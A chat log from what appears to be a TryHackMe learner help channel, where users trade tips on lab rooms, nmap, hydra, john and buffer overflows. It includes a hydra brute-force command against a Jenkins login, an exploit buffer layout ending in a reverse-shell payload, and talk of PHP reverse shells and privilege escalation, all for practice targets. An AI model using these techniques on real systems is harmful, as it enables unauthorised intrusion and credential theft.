where i can find the target machine?

Click the deploy button

Then the IP is displayed under Active Machine Information

howdy. I need to grep port numbers out of an nmap scan for use as input elsewhere. Does anybody have a canned string that will do this or can you recommend a script repository for such things?

if you run your nmap with -oG it dumps it in a more greppable format. grep open might be enough? Depends what you're looking for

thank u, it works

Gave +1 Rep to @keen iris

can anyone plz tell why it is not accepting my answer it is -format only in man page of jtr plz help me out hear is saying answer is incorrect

Look at the other flags

Note that wordlist is --

Long form flags are generally --

ok let me try --format

thanks buddy

it worked

Thanks Buff. Nikto has a nice output format for metasploit to better narrow down exploits. That's even better

nikto -h www.target.com -format msf+

man

rank 1 in the uk feels good

Hi, I am on the Internal machine and the website for the machine is down. I can't complete the course without the Internal website. Please advise. Thanks!

It's not down.
You need to add it to /etc/hosts as the room says.

Hi

bye

Room: https://tryhackme.com/room/bufferoverflowprep
Task: running of exploit (overflow 1)
Query- I created shellcode using msfvenom but I am getting error when I concatenate the payload in buffer; I getting TypeError: can only concatenate str (not "bytes") to str. When I try to perform casting the payload doesnt work. I am using python3. Any idea whats going wrong. I tried appending in b"" format/without b""/(<payload>) format, nothing is giving shell

Hi all perhaps can someone tell me when using burp suite and scan for blocked file extensions why this fails when following steps in task 4 of vulnversity

Is it because of the . In the list?

Kinda.
Make sure payload encoding is disabled

Thanks will give that a try

Gave +1 Rep to @keen iris

They will all be 200s but one will be a different response with a different length

👍

guys

has anyone completed syshacw1

i found the web flag

but i did so many scans i found nothing

only wp-admin

login.php

nikto etc but no results

could anyone help to being able to help me

That is not a public room?

Sounds like coursework potentially too?

can any one tell me why my connection is not succesfull

guide me its from beginners path metaspolit

Lhost is wrong. Set it to tun0.

still not working

Redeploy the target

After a few failed attempts, it kills the service

In what way is immunity debugger used in a buffer overflow attack, if at all? Is it used to determine if a program is capable of causing one?

It's used to find offsets etc for the attack

Not sure I'm grasping it, i'll have to read up on it

it is an http timeout, write advanced and search for the parameter responsable for the timeout delay, increase it and try again.

Metasploit is not showing things in details. You should always open Wireshark to investigate the requests it sends.

Btw everyone, is there a way to instruct Wireshark to only show packets sent by a specific software?

So wireshark also show packets sniffing and set the protocol inet

Like tcp,udp,and http

You'd filter by protocol, or destination, etc.

Hello people, new here. How do I upload an image to this channel ?

!docs verify

Follow those steps

I've tried a lot of options that should work but nothing gets accepted.

Is it acceptable for me to post the options I tried here ?

It's in the text

I tried all possibilities from the text and outside as well, but I think the interface is not accepting the string, possible misconfiguration ?

A hint for you would be, it's a verb

The answer is there, you just need to add "ing"

It worked, I tried that word without the "ing" 😆

congratulation! ◡̈

I tried so many services and processes, I never thought it'd be a "ing"

The question should be re-worded because if you catch a Linux admin and ask them for a process, they are going to think name of the binary not the act that the binary performs.

Both definitions are valid, a process is a step or set of steps

i need help with Room : "relevant"

the portscan takes too long and it returns only port 25 open

I saw the official write up, and the scan is supposed to show a different results according to it

did you try scanning beyond the first 1000 ports ?

yes

@boreal sable well the scan works when I use attackbox, but not through VPN

i waited for this machine for atleast an hour to see if this works. but it doesn't

Just a thought, maybe changing VPN location may help ?

Might need -Pn, I don't remember if it's a Windows machine

Hi team, when using NMAP, we can identify if ports are being blocked on the firewall at the destination. However, when issuing an NMAP scan at the source, how do we identify if a firewall at the source could be blocking? This would effectively fudge results, because whereas the ports might be open at the destination, they could be getting blocked by the firewall at the source. Therefore, how do we identify the list of "allowed" ports at the source using NMAP. Hope my question is clear. Thank you 🙂

What do you mean source ? If its your machine then you can check for firewall outbound rules, if you mean your upstream, then scan your upstream as if that is the destination instead of the actual destination.

Hi folks, I'm following the offensive pentesting path. I just got the "Relevant" room, and boy that escalated quickly. I gotta admit that I only got through it thanks to reading through a couple of walkthroughs. I feel like I must have missed some hints earlier in the path that would have led me to the final privesc exploit, but I can't quite think what it would have been.

Same thing happened to me, decided to backtrack and complete all beginner paths available, then went back and finished the OPP, now I'm just doing easy ctf rooms, and still have to go to write ups (sometimes) but it's a better feeling to rip the rooms apart than being glazed and then going to a write up and still kinda not sure what's going on.

i am working on Brainstorm (a bof room where where have to reverse engineer a chat program and exploit it)
i am trying to run the exe file locally first for testing with immunity debugger but i cannot run the exe file as it is 32bit file but i am running 64bit windows
i also tried it on 64bit windows 7 vm but it's same as both are 64bit is there any other option to get it working other than a 32bit windows vm

I belive you have to download the 32 bit version

And mona too

Going through the Hashing Crypto 101 room and I am not having much luck cracking this hash. I was able to identify the hashing algorithm using the tool on hashes.com (hash identifier). hash-identifier fails to identify it on Kali.

haiti is a better tool for identifying hash types, it is covered in crack the hash 2

haiti identifies it as BigCrypt

We good I figured it out 😄

Hi Everyone! I'm trying to install apt install bloodhound neo4j on my attack box machine and it does not work. I got an error saying E: Unable to locate package bloodhound. I tried to apt upgrade && apt update and it does not work either. Anyone know an alternative for installing those packages? Room: Attacktive Directory

That sounds like a good idea. I think my problem is that I understand (sorta) the tools, but don't have a good gut feeling for which path I should be taking. I guess I just need more experience.
I worked on the "Internal" room after my last comment, and it was much better. I had to look at a write-up once or twice, but I felt much more in control of the situation. Practice, practice, practice!

hey, I'm running into the same issue. I tried running a 32bit windows 10 vm, but I get an error "ERROR_ENVVAR_NOT_FOUND". did you you ever figure it out?

A reddit post says to "you need to use the command binary before downloading chatserver.exe and its dll to avoid corruption of the files" but I don't know what that means

yeah i was having the same issue so i downloaded the binary again in "binary" mode and it worked i tested it on 32 bit windows 7 vm what you have to do is download the files in binary mode you can do this by entering binary command and then downloading the file and don't forget to get the dll file too and place both the file in a same location and try again it should work

Im unable to connect to the webserver in Vulnversity, but i can connect to other target machines in other courses. Is there a known problem with the target machine?

howdy - on overpass 2, task 3 - I'm at the last section to regain access to the machine. Essentially - the creds that were acquired for user james don't appear to work. I eventually checked against multiple walkthroughs - and i'm doing the same thing, it's just that the creds don't seem to be working. Anyone else encounter this? (it does not work after multiple restarts of the vuln machine either)- ignore ... just being stupid...

can anyone give suggestion for this the script is not running and if run with python3 giving syntax error what should i do now

Research the error. It says no module found so you have to install it.

He y

Add the port number at the end unless it’s located on port 80 or just restart the test machine. At times the test machine stops responding.

Hi guys concerning the BRAINSTORM machine, the chat.exe won't run i tried windows7 32bits and even windows Xp, and nothing comes up, can i have some guidance pls, the problem

@rain glade make sure you download it in binary mode from the FTP server

Plus any additional DLL etc

Hi @keen iris. I am currently tackling BRAINSTORM machine and Ive been banging my head to the wall for over a week so far! I managed to get the offset which is 20** but then when I modify the exploit with the offset (removing the payload and adding 4 B`s at retn) I run the payload against the chatserver but the app doesnt crash or it does but the EIP is not controlled by 42424242! I tried diffrent scripts, modified a lot but nothing changed! I can crash the server with the exploit but not controlling the EIP for me to find bad chars and then the jumping point to generate a shellcode. Is anybody familiar with this issue who can advise? Just to mention I am running the valnurable server on remote computer desktop I work at from home as well as the Kali VM on it but I have admin access on it and I can do whatever I want (firewall has been turned off.) What could be the problem, is it something i am doing wrong or could it be the way I am running the server (should be on a virtual machine like Kali rather than a main theme windows installation? Much appreceiate any help in advamce.

I can't help you

Please don't just ping me when you want help.
Everyone is a volunteer here and they help when they can and when they want.

-mute @ivory schooner Don't be rude. Show some respect for volunteers of this discord. There's zero obligation to help you, and being rude to them makes people even less inclined to actually offer help here.

🔇 Muted Itachi9669#4890 for 1 day

lol

Ouch

Sometimes a 15 minute break will do wonders,

having problems with the eternal blue room, exploit rarely works, and when it does, i am presented with meterpreter shell and not a windows one to excalate from, anyone else experiencing issues?

I believe there's an instruction to change the payload.

A meterpreter is just fine. You just need to skip aheap past upgrading it.

There's no escalation, you're already system.

Thank you, i was able to bypass that part, i appreciate it!

the machine is really unstable, the shells kept dying, took forever to get the flags

Second rule for the jamesBot , change payload,

Not a bot.
If it's being unstable, that's more likely to be your connection (VPN)

that's exactly what a bot would say 🤔

Kinda rude.

hello guys just want to ask a question for brainstorm virtual machine I use my immunity debugger to open the file however the system says not a valid pe not a 32bit Protable Executable how to solve it?

@fleet wedge Make sure you download the files in binary mode from FTP

Otherwise they do not copy correctly

can you tell me the reason?

You're copying binary data. FTP needs to be in binary mode to copy binary data otherwise things get misinterpreted

oh I understand that thank you so much

Hello I'n new
I can't scan nessus scanner on nessus room machine. What should I do

haven't used nessus in a while, wanted to help you, but forgot how long it takes to load, loading it, should be ready in a few hours,

got this credentials in database.php in ignite room final root privilege excavation

but when trying to login its saying wrong password

see any solution or mistake done by me

Those are database credentials?

They're not often gonna be shared with the root account on the system

sir i went through walk through as i am beginner for this same is accepted for root privilege there

this is the write-up i followed https://exploits.run/ignite/

try ssh as root

What’s the easiest type of pentesting?

shoulder surfing

Hellow, can someone help to answer the question of why GoBuster is not working in my Browser-Kali machine? I followed the instraction and typed sudo apt-get install gobuster. and after its finished download, I typed gobuster to run it, but nothing happens.

@coarse grail please do not spam the same question over several channels

oh sorry

im new

Also I replied in #site-support

ok i'll go back there to take a look

which room should i start for pentesting learning

Check out #start-here, it will guide you

i dont reallly find anything that can guide there can u help

You can also try the pure beginner path on the site

thanks

Gave +1 Rep to @keen iris

I’m about to complete my first ctf!!!

Hi everyone.
I have trouble understanding network concepts in general in the tryhackme network fundamentals room, can anyone link for a more simple explanation of that subject? I visited a few sites and watched a few YouTube videos on that but they're not as simple as I wish.

Yeah and I am French me lol I spent three days on it seems good 🙂

what

I am almost done with the Linux room to be fair

Computer networking is all about PacketTracer

Lol

You need to learn how to build good typologies to be able to demonstrate how it's connected and is the Packets flowing from one end to the other.

😊

Hello guys just want to ask if I want to get the Offensive Pentesting certificate, do I also need to finish the extra credit part ?

Sorry

@fleet wedge Most likely. However, you can confirm this by selecting the download button at the top right hand side of the screen where it mentioned the certificate. If you can't download it then your answer is yes you need to complete it. 🙂

I believe so

Extra credit usually means optional

Guys I can't do the privesc on retro

I think something is broken on the box

Yes, something is definitely broken, I've been trying the exploit for hours now

I'm giving up

Completed offensive pentesting 🎉🎉

@fleet wedge Yes you need to complete all the credits

But they are easy don't worry

got it include the extra part right?

Yes the credits are the extra parts

omg I was struggling to understand the detailed concept of downloading repositories and editing them using nano

idk in what context but if you have access to victim machine, check AV logs

if you are talking about some challenge, sometimes you just need to reset the victim machine, as there can be artifacts from old attacks

which interfere with your own

lastly, try different kind of shellcodes

this would be my train of thought anyway based on what you have provided

we have all been there

Hi

I am using TryHackMe

@elfin apex Welcome, do you need any help? Otherwise you'll probably get more of a conversation in #general 🙂

dumpster diving?

done plenty of that don't miss it, (for recovery not info)

!rank

Hi guys, i just reached the active directory in OSCP i know it s very important, however, i wanna know if it is part of the exam because offsec said that the exam will remain the same.

road plz :3

@elfin apex razer man

The exam got an update and Active Directory is now a part of it

The water boils at 100 degree Celsius at sea level, sugar is sweet, the sky is blue, the sun is hot....

I might have misunderstood your question but anyway thanks for your kind and non-sarcastic answer

I thought you were sarcastic, thats why i answered like that

Well I was not

I just wanted to know if even if it is part of the exam (Active Directory), is it part of the exam

pff go research it yourself lol as if I would answer your questions after you giving me such a shitty response

not that hard to find out

I've already found the answer, just wanted to be polite, cause i answerd you saracasticly while you were serious....

An apology would be the polite action but yea nvm

Hey everyone 👋 , just curious if anyone has thoughts on this. On the Alfred room, task 3, isn't it incorrect to say we are using SeImpersonatePrivilege to priv esc to SYSTEM?

In the last step after using meterpreter's incognito module to impersonate a SYSTEM token, the instructions then say to use meterpreter's migrate module to get our shell running in a SYSTEM process. But that actually uses SeDebugPrivilege to work. You can even not do any token impersonation at all and just migrate your shell to a SYSTEM process and get root.txt.

To use SeImperosnatePrivilege for priv esc you would have to launch a process (like a reverse shell) with the token via CreateProcessWithTokenW() or use some other tool like Juicy Potato to do it. Just the meterpreter incognito module is not enough I think.

hey guys, I am feeling particularly less confident on my "Buffer Overflow" skills. And I think I will need to work on it from the ground level and In-depth.

Does anyone have any Idea about Where I can find relevant resources

On THM I can recommend:
Buffer Overflow Preb for OSCP
Brainpan
Brainstorm
Gatekeeper

On Youtube you can take a look at the BoF playlist from TCM and the binary exploitation playlist from liveoverflow

On my site I got some writeups e.g. for Brainstorm that explains my procedure

@willow pewter okay, I positively looked at what you recommended me, saying about writeups and rooms. Buddy these were the reasons for me to realize that I needed to understand the real basics in this field first.

So if you got more than that, like the TCM and liveoverflow playlist you said (preferably video lectures) are more appropriate for my style of learning.

Either way, thank you for the response and your recommendation I'll surely look into it again and again.

But more suggestions are welcome from the community.

Gave +1 Rep to @willow pewter

Ah well I would definitely take a look at C (the protostar binaries e.g. also provide the C code) in order to understand memory management on the stack and heap.
Glad I could help u a bit, unfortunately I dont have more beginner friendly resources regarding BOFs

Its says the error just bottom of the blue update file button

I can't add the reverse shell in WordPress 404 template
Room -internal

Don’t like that theme

Hey guys my name is Ivan, pleasure.

Im interested on learning hacking... ethical, not ethical? idc to be honest, i just want to know something else than crypto trading, i find ethical/non-ethical hacking fun and i would like to learn it to transmit fear 😉 (kidding)

i know basic python, nothing else lol, how could i start with everything? will windows 10 help me or itll make everything more difficult?

Top tip. We don't like unethical people around here -- if that's your goal, I'd recommend leaving fairly quickly 🙂

i never said i want to do unethical things

well maybe yeah, let me reformulate

Im interested on learning hacking...
I just want to know something else than crypto trading
I find hacking fun and i would like to learn it so that my life is a bit more interesting 😉

i know basic python, nothing else lol, how could i start with everything? will windows 10 help me or itll make everything more difficult?

i appreciate any help - i wish you have a great day!

?

https://tenor.com/view/anyone-there-looking-goofy-binocular-gif-8878466

someone help pleaase 😦

Pre Security path

can anyone tell whats the difference b/w offensive and defensive pentesting

Pls, i will appreciate, anyone who can help me with this.....

How would you refer to data at layer 2 of the encapsulation process (with the OSI model)?

Which is the only layer of the OSI model to add a trailer during encapsulation

pentesting is standardly an offensive event, the pentesters goal is to get in to or test a network depending the scope; for defensive you are most likely working on a blue team trying to keep the pentester or detecting their movements; a pentester will also submit a report at the end of the test of what they were able to do and how to fix possible issues

Is PenetesterAcademy worth it?

Ask in #infosec-general .

lover

scp copy command consider copy the file from windows to kali

No, it's not distributed

5 minutes ago i finished offensive pentesting path
what a great experience and feeling ❤️ good luck everyone

Gave +1 Rep to @keen iris

Hey guys, is there any way to simply add a Metasploit meterpreter shell once you have shell access to a Windows box?

Ideally you want to create an msf shell, but try : use post/multi/manage/shell_to_meterpreter

@fleet wedge

hello?

Hi. How long takes a full (-A -p-) nmap scan in the attackBox usually? I am doing the Beginner Path 🙂

depends on the host as you are running all checks on all ports

I am using both machines by THM (the victim and the "attackbox" in browser)

Another question:
I am in Networking2 room (the beginner pathway). And trying to exploit the NFS file system. Here I should modify a bash file with "chmod" to add a SUID Bit... the permissions have updated, but are not correct yet...

Ok i cant upload an image...

Task is:
Let's do a sanity check, let's check the permissions of the "bash" executable using "ls -la bash". What does the permission set look like? Make sure that it ends with -sr-x.

My ls -la bash command brings:
-rwSr-Sr-- 1 root root 120219 Jul 20 18:43 bash

can anyone help me?

Capital s means suid but not executable

hmm... interesting, but what could be wrong?

It wasn't executable before, so you only added suid but not executable

Ah I see, because the x is missing here...

You can fix it by adding suid and executable at once.
If you just add executable, it'll lose suid as suid will go whenever you modify permissions or the file itself

The s or S fill the space that the x would show up in, but s means suid+executable, S means suid but not executable

Or add executable and then suid, as two commands

Okay, I ll try right now, thanks a lot! 🙂

Seems to work now. It is

-rwsr-sr-x

Great! Answer is correct now! Many THX 🤩

Gave +1 Rep to @keen iris

Ah great

anyone suggest me ejpt level machines ??

yo, im so fucking noob in this things but i want to learn how to "invade" websites with pentest tools, but i don't know where to start

if u have knowledge of sql injection etc, call me pls i need to change my grades in my school lmao but i cant invade them with my less knowledge about this things

@crimson flame

-ban 796526801055907852 seeking help hacking school.

🔨 Banned insert name#9999 indefinitely

Hello, I'd like to know if there is a john equivalent to the hashcat's ipv4 mask list ? (https://pastebin.com/4HQ6C8gG) or how to use it in john
In order to use it with the file created by known_hosts2john.py , and avoiding having to create a wordlist with 4294967296 lines

In lack of solution, I created a script that execute the john command with the masks 1 by 1. This is unfortunately longer than doing the hashcat command (about 2 to 3 times longer), 5 minutes instead of 2 for 1 IP address. I don't know if this is because my host's GPU is better than my CPU's physical cores inside my VM, that's probably it

Does anyone know what port pth-winexe connects to? Because on a box that I was working on, only HTTP and SMB ports were open but PTH-Winexe still connected?

anyone else having problems with BOF prep room? the win 7 machine is freezing half way through almost every oscp BOF exploit. Im up to the 7th oscp BOF loving the rm but not having to restart so often. anyone know if tib3rius has the vuln binary folder somewhere, didnt see it on his github. At this point figure id just set up my own vm.

Any best resource guys for NIST cyber security Framework? 😘

https://tryhackme.com/room/windowsfundamentals1xbx
Windows Fundamentals
Task 6
What is the account status?

What does this mean?

Check the user's properties of the previous question and see which box is checked

Thanks!

hey guys, any idea what is the best approach to manage privilege accounts ? what possible strategy ?

shouldn't EIP be the address i put in the retn variable? and why is there a 2F, before the nop sled?

EIP has 33 at the end and the ESP has 30

please don't spray your (vague) question across multiple channels, one is enough I would say

Hi guys in oscp course, they did a example of html application attack on internet explorer, how ever i wanna know if it is possible to use this kind of attack on microsoft edge

Yes, it's "loud".

anyone else done with daily bugle?

i am unable to get a reverse shell after editing the index.php file in joomla even after referring other walkthroughs

I have got this "WARNING: Failed to daemonise. This is quite common and not fatal. Connection refused (111)

seems like a lot of people are getting the same

is your listener up

yes

i used my tun0 ip in the php reverse shell

and a netcat listener is ready at port 1234

usually the error is when the rev shell can't connect

Tried with the attackbox and got the shell

however the same doesnt work in case of openvpn and a lot of people have faced the same problem

that's strange, couldn't say why

@near storm have mine pointed at 9001, shouldn't make a difference but sometimes it does,

i had tried 4444 but it failed

9999 as well

what page are you putting your shell,

i am done with the box

lol

https://www.google.com/search?q=warning%3A+failed+to+daemonise.+this+is+quite+common+and+not+fatal.+connection+timed+out+(110)&oq=&aqs=chrome.0.35i39i362l5...5.-1j0j7&client=ms-android-xiaomi-rvo2&sourceid=chrome-mobile&ie=UTF-8

its a pretty common error

check it out

around 30 people have discussed it in tryhackme forum and this server.....seems like the firewall blocks the traffic

i see

seems like you do tryhackme all the time

i see you are 0XD

how log have you been using the platform

eight months

so that box i did in February, so it took me a moment to look at my notes,

Has anyone here has done the bufferoverflow prep recently? I'm struggling to get the EIP offsets in overflow 2. I have the length from the fuzzer but the findmsp command returns other registers

I read in a write-up about creating a payload with increased bytes, but I didn't understood why is that okay and why does that still work.

Well, it still does not come up in the mona output. I just have esp, ebp, and edx

Interestingly enough, I skip to overflow3 and I get the EIP register from there 😦

Well, it happened again in Overflow4. Not sure if the challenge is broken or I have no clue what I am doing (which is highly likely). If anyone could give me some nudges, I would be extremely thankful 🙏

when using fuzzer.py the bytes needed to crash the program will overwrite EIP with minimum amount of bytes. you increase the size of the pattern because that is where your payload will be. if you look at the code form exploit.py its pretty clear.
buffer = prefix + overflow + retn + padding + payload + postfix
pre/postfix self explanatory, overflow gets you to EIP offset, where retn is the jmp addr, padding is NOP sled, payload will be your reverse shell clear of bad chars

It crashes the program, from my understanding - the bottom right goes back to pause blinking state. The issue is that mona code that is either not returning all registers, or just returning some (but not EIP).

Thanks for explaining why increasing the payload still works though, I got it now 🙏

Can I force gcc not to generate endbr32 instruction for indirect jumps and calls
I was following along with opensec intro to x86 but it seems like I can get the compiler to generate the same assembly
Anybody can help ?

Can not *

Have you tried using the -fcf-protection=none flag for gcc?

It will keep endbr32 instructions for linker/libc functions however any user-defined functions should not include endbr instructions in the prologue

Hello fellows, quite new here, and pleased to meet you. Any assistance to bypass Comodo WAF in Burp Suite Pro while active scanning .. can't seem to find any breakthrough as WAF blocks my requests. Cheers

Hello, I have a question regarding the Internal room. I have been trying to do them without referencing write-ups, but I have come to a point that I couldnt figure out so I started referencing them as well as the forums and google searches to no avail. I am at the point where I have set up a tunnel from the machine so I can access the jenkins server, and I am able to reach it at lets say localhost:1234. I intercepted the login packet, and am trying to brute force it with hydra. I have tried writing my own as well as copying and pasting others hydra strings and I keep getting false positives. I know what the answer should be but I hate to move on without getting it right. Any recommendations? I am using

that gets set up fine, I am able to access jenkins at localhost:1234

hydra 127.0.0.1 -l admin -P /root/Tools/wordlists/rockyou.txt -s 1234 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password" -V -f

This always returns superman (which is a false positive), I cant figure out how to get past this point.

Perhaps another tool, like Burp or zap?

I am trying wfuzz right now, never tried zap so I will give that a shot. Thanks!

So I got it with Zap, but I was curious still what was going on. I was looking at verbose mode output and saw this. It looks each successive attempt adds the port again. This leads me to think it is either a bug or user error (leaning towards user error).

has anyone used pwncat with Steel Mountain? I setup pwncat as a listener, I run the exploit, pwncat receives the connection, then it just times out

no I just used netcat on that room, it worked fine

try it with netcat and see if that works for you, keep in mind that the shell just may be unstable and die every so often regardless

it is not a bug 🙂 , I used hydra to do this room, the command you needed was this
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-form-post "/login/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid" -s 8080

the issue is you only had /j_acegi_security_check instead of the full path for the form action which was /login/j_acegi_security_check (always inspect the html code on the page and see what the html form action= is doing)

What payload did you use?

I figured it was user error! Thank you so much!

Gave +1 Rep to @pearl citrus

Actually, running that command exactly as typed (changing the port to what I used in the SSH -L still gave me the same false positives
2 brand new machines were spun up to test, all commands run (since I already know passwords for the user I could skip past the initial brute force/remote shell
Did you use the AttackBox or your own machine over the VPN?

added [target machine ip]  internal.thm
ssh -L 1234:172.17.0.2:8080 [user]@internal.thm
entered user password

opened browser, could access jenkins by going to localhost:1234
Turned on burp proxy with foxy proxy ( I used 1234 just so it wouldnt collide with the preconfigured 8080 proxy for burp)
Intercepted the login, also inspected the webpage

Ran command you put copy and pasted, changing the port to match the tunnel I made and am still having issues. Attached are images of what I am seeing. I know others (that have done write ups and forum posts) are having the same issues.

One last post regarding this, as I think it may actually be a bug. When attempting with a Kali Box provided by tryhackme (instead of an attackbox), with the same commands, it worked.

I used my own VM not attackbox, but I don't think it should matter. Not sure what could be causing an issue for you 🤔

@vernal bronze oh I think I might know why, when you did your ssh reverse port forward you used this command ssh -L 1234:172.17.0.2:8080 [user]@internal.thm but you should be using 1234:MACHINE_IP:8080

use the actual IP for the machine (the 10.10.x.x one) not the 172.17.0.2 one

snippet from my notes, you can see that the Jenkins service is running on localhost:8080 not 172.17.0.2

Hey iam downloadload my openvpn configuration file iam using it in kali linux when i tryto connect machine in linux fundamental 1 room what can i do help me

are all the rooms in this path free or some are subscribers only?

I believe some are subscribers only

there are a couple in the path that are free though 🙂

I will give that a shot when I get into the office. It is just weird that the same commands on their provided kali Linux machine worked as expected but failed on the attack box

So I attempted to change that ip to the machine ip as requested, and it cannot reach it. I think (but I am still learning most of this) the jenkins server is running on docker which is on the 172.17.0.2 IP which is unreachable from the main IP of the target machine.

If you follow these steps, it should work on VM at least, didn't try attackbox 👍

Yeah I was able to get it working with Kali, but just recreated those and it didnt work. Apparently the attackbox is also running docker so that might be causing some kind of issue. Best I can offer to anyone with this issue is to use their own VM or the kali vm and not attackbox for this exercise

I do appreciate the help though with this.

yea no problem, I hate it when stuff doesn't work so I'm happy to help lol

oh no 😦 you should try using OneNote from Microsoft, it's free and backs up to the cloud automatically, it's a nice tool for note taking

Does anyone know why the mona plugin for Immunity Debugger is saying that \x01\x02\x03\x04 are bad chars here? Those bytes seem to match the pre-generated bytearray, so I'm confused why mona thinks they're corrupted.

\x23 and onwards makes sense, but not \x01 - \x04

Hi

what CPU are you using? My hunch is that there are some reserve addresses on whatever chipset you're using

It'll be x86.

I'm taking a look at the python code.
#---------------------------------------#

Populate constants

#---------------------------------------#
memProtConstants["X"] = ["PAGE_EXECUTE",0x10]
memProtConstants["RX"] = ["PAGE_EXECUTE_READ",0x20]
memProtConstants["RWX"] = ["PAGE_EXECUTE_READWRITE",0x40]
memProtConstants["N"] = ["PAGE_NOACCESS",0x1]
memProtConstants["R"] = ["PAGE_READONLY",0x2]
memProtConstants["RW"] = ["PAGE_READWRITE",0x4]
memProtConstants["GUARD"] = ["PAGE_GUARD",0x100]
memProtConstants["NOCACHE"] = ["PAGE_NOCACHE",0x200]
memProtConstants["WC"] = ["PAGE_WRITECOMBINE",0x400]
There are some constants defined in mona.py

https://github.com/corelan/mona/blob/master/mona.py
It appears to be chipset agnostic.. I guess not enough info :/
It wouldn't explain 0x3